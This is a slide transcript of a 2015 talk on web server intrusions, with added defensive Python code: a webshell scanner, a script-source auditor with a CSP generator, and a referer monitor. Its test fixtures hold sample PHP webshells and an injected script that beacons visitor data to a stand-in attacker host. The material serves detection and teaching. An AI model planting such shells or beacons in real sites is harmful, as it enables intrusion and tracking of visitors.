Intrusions and the Modern Web
Benjamin Scott
November 23, 2015
how and why bad guys break into servers
Transcript
Intrusions and the Modern Web
Benjamin Scott
[email protected]
The Modern Web
- Threat model: high - organized e-crime / espionage groups
- Risk profile: high - web developers want features / uptime
- Defense budget: low - until the breach hits the news
Goal of Intrusions
- Liquid assets: credit cards / incoming traffic / hosting
- Enterprise access: non-segmented network / shared admin
- Great visibility: build a profile of visitors who trust the site
Intrusion Lifecycle
- Break In: find and exploit a websec / appsec issue
- Dig In: install a persistent backdoor
- Spread Out: rinse and repeat
Break In
- Choose target: highly trafficked / VIPs of interest
- Try bruteforce: default admin / SQLi / file inclusion
- Use exploit: vulnerable service / CMS
(really) Break In
- Steal creds: phish admins / keylog home machines
- Buy access: hire mercenaries / logins from the underground
- SIGINT: use active MITM to inject binaries
Dig In
- Install webshell
  - e-crime: PHP shells
  - CN, Shell Crew: ASP shells
  - RU, Crouching Yeti: JavaScript patchwork
  - RU, APT28: custom kit with analytics
- Keep access: local privilege escalation / new accounts
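The PHP shells on this slide are usually tiny: a file dropped into a writable directory that passes whatever arrives in a request parameter to eval() or a shell. The scanner below is an added example (not code from the talk) that walks a web root and flags PHP files carrying a handful of such constructs. The indicator list, the sample files and the paths under wp-content/ are constructed for the demo; treat the patterns as a starting point for a hygiene scan, not a complete signature set, since real shells are often further obfuscated.

```python
import re
import tempfile
from pathlib import Path

# Indicators: constructs that are rare in legitimate application code but
# near-universal in PHP webshells. Illustrative set, not a complete signature base.
INDICATORS = [
    ("eval_of_request_input",
     re.compile(r"\b(eval|assert)\s*\(\s*[^)]*\$_(GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("exec_of_request_input",
     re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\([^)]*\$_(GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("decode_then_eval",
     re.compile(r"\beval\s*\(\s*(gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(", re.I)),
    # preg_replace() with the /e modifier evaluates the replacement as PHP code
    ("preg_replace_e_modifier",
     re.compile(r"\bpreg_replace\s*\(\s*(['\"])([^'\"\w\s])[^'\"]*\2[a-z]*e[a-z]*\1", re.I)),
    # $_POST['f']('arg'): function name chosen by the attacker at request time
    ("dynamic_call_from_request_input",
     re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[[^\]]*\]\s*\(", re.I)),
]


def scan_source(source: str) -> list:
    """Return the names of the indicators present in one PHP source text."""
    return [name for name, rx in INDICATORS if rx.search(source)]


def scan_tree(root: Path) -> dict:
    """Walk a web root; map each suspicious PHP file (relative path) to its indicators."""
    findings = {}
    for path in sorted(root.rglob("*.php")):
        try:
            hits = scan_source(path.read_text(errors="replace"))
        except OSError:
            continue
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


# Constructed sample files for a demo web root (not artifacts from any real incident).
SAMPLES = {
    # one-line shell dropped into an upload directory: runs whatever is POSTed
    "wp-content/uploads/2015/11/cache.php": "<?php @eval($_POST['c']); ?>",
    # obfuscated variant: payload arrives compressed and base64-encoded in a parameter
    "includes/helper.php": (
        "<?php\n"
        "$x = $_REQUEST['x'];\n"
        "eval(gzinflate(base64_decode($x)));\n"
    ),
    # legitimate application code: no indicator should fire
    "app/controllers/user.php": (
        "<?php\n"
        "function load_user($id) { return db_fetch('users', (int) $id); }\n"
    ),
}


def write_samples(root: Path) -> None:
    """Materialise the constructed samples under a temporary web root."""
    for rel, src in SAMPLES.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(src)


def demo() -> dict:
    """Scan the constructed web root and return {relative path: [indicators]}."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        write_samples(root)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, hits in demo().items():
        print(f"{rel}: {', '.join(hits)}")
```

Run it against a real web root with scan_tree(Path("/var/www/html")) and expect some noise from frameworks and plugins; the useful signal is a file that is new since the last clean deploy, sits in an upload or cache directory, and trips an indicator.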
Spread Out
- Identify victims: profile visitors / validate VIPs
- Deliver exploits: serve up a tailored exploit
- Relay traffic: implant commands sent via a covert channel
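The "JavaScript patchwork" from the Dig In slide is what makes this stage work: one extra script tag in a trusted page profiles visitors and serves the exploit. The added example below (not code from the talk) is a honeyclient-style check: it fetches nothing itself but parses a page as a visitor's browser would, collects every script source, and diffs the set against a baseline recorded from a clean deploy. The same baseline is then emitted as a Content-Security-Policy script-src directive, which is the mitigation the talk names. The page origin, CDN host, stats host and both HTML documents are constructed for the demo; the injected profiler snippet is inert text.

```python
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptCollector(HTMLParser):
    """Collect external script src values and inline script bodies from one HTML document."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._buf = None          # list while inside an inline <script>, else None

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def origin_of(src: str, page_origin: str) -> str:
    """Map a script src to the CSP source expression that would allow it."""
    u = urlsplit(src.strip())
    if u.netloc:
        scheme = u.scheme or urlsplit(page_origin).scheme   # "//host/x" inherits the page scheme
        return f"{scheme}://{u.netloc}".lower()
    if u.scheme:                                            # data:, javascript:, blob: ...
        return f"{u.scheme}:"
    return "'self'"                                         # relative URL: same origin as the page


def csp_hash(body: str) -> str:
    """CSP hash-source for an inline script: sha256 over the exact bytes between the tags."""
    digest = hashlib.sha256(body.encode("utf-8")).digest()
    return "'sha256-" + base64.b64encode(digest).decode("ascii") + "'"


PAGE_ORIGIN = "https://www.example-site.test"            # constructed
KNOWN_INLINE = 'window.cfg={"v":1};'                      # inline snippet the clean template emits (constructed)

# Baseline recorded from a clean deploy: allowed script origins plus inline hashes.
BASELINE = {"'self'", "https://cdn.example-site.test", csp_hash(KNOWN_INLINE)}


def audit(html: str, page_origin: str, baseline: set) -> dict:
    """Return the script sources in `html` that the baseline does not allow."""
    c = ScriptCollector()
    c.feed(html)
    c.close()
    unknown_external = sorted({origin_of(s, page_origin) for s in c.external} - baseline)
    unknown_inline = [b for b in c.inline if csp_hash(b) not in baseline]
    return {"unknown_external": unknown_external, "unknown_inline": unknown_inline}


def csp_script_src(baseline: set) -> str:
    """The Content-Security-Policy directive that enforces the same baseline in the browser."""
    return "script-src " + " ".join(sorted(baseline))


# Constructed page as the clean deploy serves it.
CLEAN_PAGE = f"""<html><head>
<script src="/js/app.js"></script>
<script src="https://cdn.example-site.test/lib.js"></script>
<script>{KNOWN_INLINE}</script>
</head><body><h1>Home</h1></body></html>"""

# Same page after the intruder's patchwork: a remote loader plus an inline snippet
# that reports the visitor's browser to an off-site host (constructed, inert).
PATCHED_PAGE = CLEAN_PAGE.replace(
    "</head>",
    '<script src="//stats.example-crew.test/t.js"></script>\n'
    '<script>new Image().src="//stats.example-crew.test/p?u="+encodeURIComponent(navigator.userAgent);</script>\n'
    "</head>",
)

if __name__ == "__main__":
    print("clean:  ", audit(CLEAN_PAGE, PAGE_ORIGIN, BASELINE))
    print("patched:", audit(PATCHED_PAGE, PAGE_ORIGIN, BASELINE))
    print("Content-Security-Policy:", csp_script_src(BASELINE))
```

Two caveats when using this for real: fetch the page with a browser-like User-Agent and from an outside network, because tailored delivery often keys on both, and regenerate the inline hashes on every deploy, since any template change invalidates them (which is also why the talk pairs CSP with clean, repeatable deploys).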
Mitigations
- Monitoring: new referers / odd scripts / insecure configs
- Agile response: share tools between operations / security / IT
- Clean deploys: appsec tests in CI / hardened images / CSP
- Hygiene checks: scan / honeyclient / red team your site
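"New referers" is the cheapest of these monitors: every request to the site already carries one, and a host that has never sent traffic before is either a new partner or a page that is now linking visitors into something it should not. The added example below (not code from the talk) parses combined-format access log lines, learns the set of referer hosts from a known-quiet period, and raises one alert per unseen host in the watch period with the first request it pointed at and how many followed. All log lines, IP addresses and hostnames are constructed for the demo.

```python
import re
from collections import OrderedDict
from urllib.parse import urlsplit

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse(line: str):
    """One log line -> dict of fields, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def referer_host(ref: str):
    """Host part of a Referer value; None for missing ('-') or malformed values."""
    if not ref or ref == "-":
        return None
    host = urlsplit(ref).hostname
    return host.lower() if host else None


def build_baseline(lines) -> set:
    """Referer hosts seen during a period believed to be clean."""
    hosts = set()
    for line in lines:
        rec = parse(line)
        if rec:
            h = referer_host(rec["referer"])
            if h:
                hosts.add(h)
    return hosts


def new_referers(lines, baseline: set) -> list:
    """One alert per referer host absent from the baseline, in order of first sighting."""
    alerts = OrderedDict()
    for line in lines:
        rec = parse(line)
        if not rec:
            continue
        h = referer_host(rec["referer"])
        if not h or h in baseline:
            continue
        a = alerts.setdefault(h, {
            "host": h,
            "first_seen": rec["time"],
            "first_request": f'{rec["method"]} {rec["path"]}',
            "count": 0,
            "client_ips": set(),
        })
        a["count"] += 1
        a["client_ips"].add(rec["ip"])
    return list(alerts.values())


def line(ip, ts, method, path, status, ref, ua="Mozilla/5.0"):
    """Build one constructed combined-format log line."""
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 "{ref}" "{ua}"'


# Constructed quiet period: the referers a healthy site normally sees.
QUIET_PERIOD = [
    line("198.51.100.10", "16/Nov/2015:09:00:01 +0000", "GET", "/", 200, "https://www.google.com/"),
    line("198.51.100.11", "16/Nov/2015:09:00:07 +0000", "GET", "/news/", 200, "https://www.example-site.test/"),
    line("198.51.100.12", "16/Nov/2015:09:00:09 +0000", "GET", "/favicon.ico", 200, "-"),
]

# Constructed watch period: one forum thread now sends visitors straight to a PHP file
# in an upload directory, and one unfamiliar blog links to the front page.
WATCH_PERIOD = [
    line("203.0.113.5", "23/Nov/2015:10:01:12 +0000", "GET", "/news/", 200, "https://www.google.com/"),
    line("203.0.113.20", "23/Nov/2015:10:02:30 +0000", "GET", "/wp-content/uploads/2015/11/cache.php", 200,
         "http://board.example-crew.test/thread/42"),
    line("203.0.113.21", "23/Nov/2015:10:03:01 +0000", "POST", "/wp-content/uploads/2015/11/cache.php", 200,
         "http://board.example-crew.test/thread/42"),
    line("203.0.113.22", "23/Nov/2015:10:05:44 +0000", "GET", "/", 200, "https://blog.partner.test/post/1"),
    line("203.0.113.23", "23/Nov/2015:10:06:00 +0000", "GET", "/", 200, "-"),
]

if __name__ == "__main__":
    for alert in new_referers(WATCH_PERIOD, build_baseline(QUIET_PERIOD)):
        print(f'{alert["host"]}: first {alert["first_request"]} at {alert["first_seen"]}, '
              f'{alert["count"]} requests from {len(alert["client_ips"])} clients')
```

Both hosts are reported, and that is the point: the monitor does not decide which new referer is hostile, it only makes every first appearance visible. The one pointing at a .php file under an upload directory is the kind of alert that pairs with a webshell scan of that path; the other is a thirty-second check. Feed it from a log tail rather than a file for something close to real time, and rebuild the baseline after each clean deploy.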
Thanks for listening
Benjamin Scott
[email protected]
github.com/benjaminxscott
about.me/benjaminxscott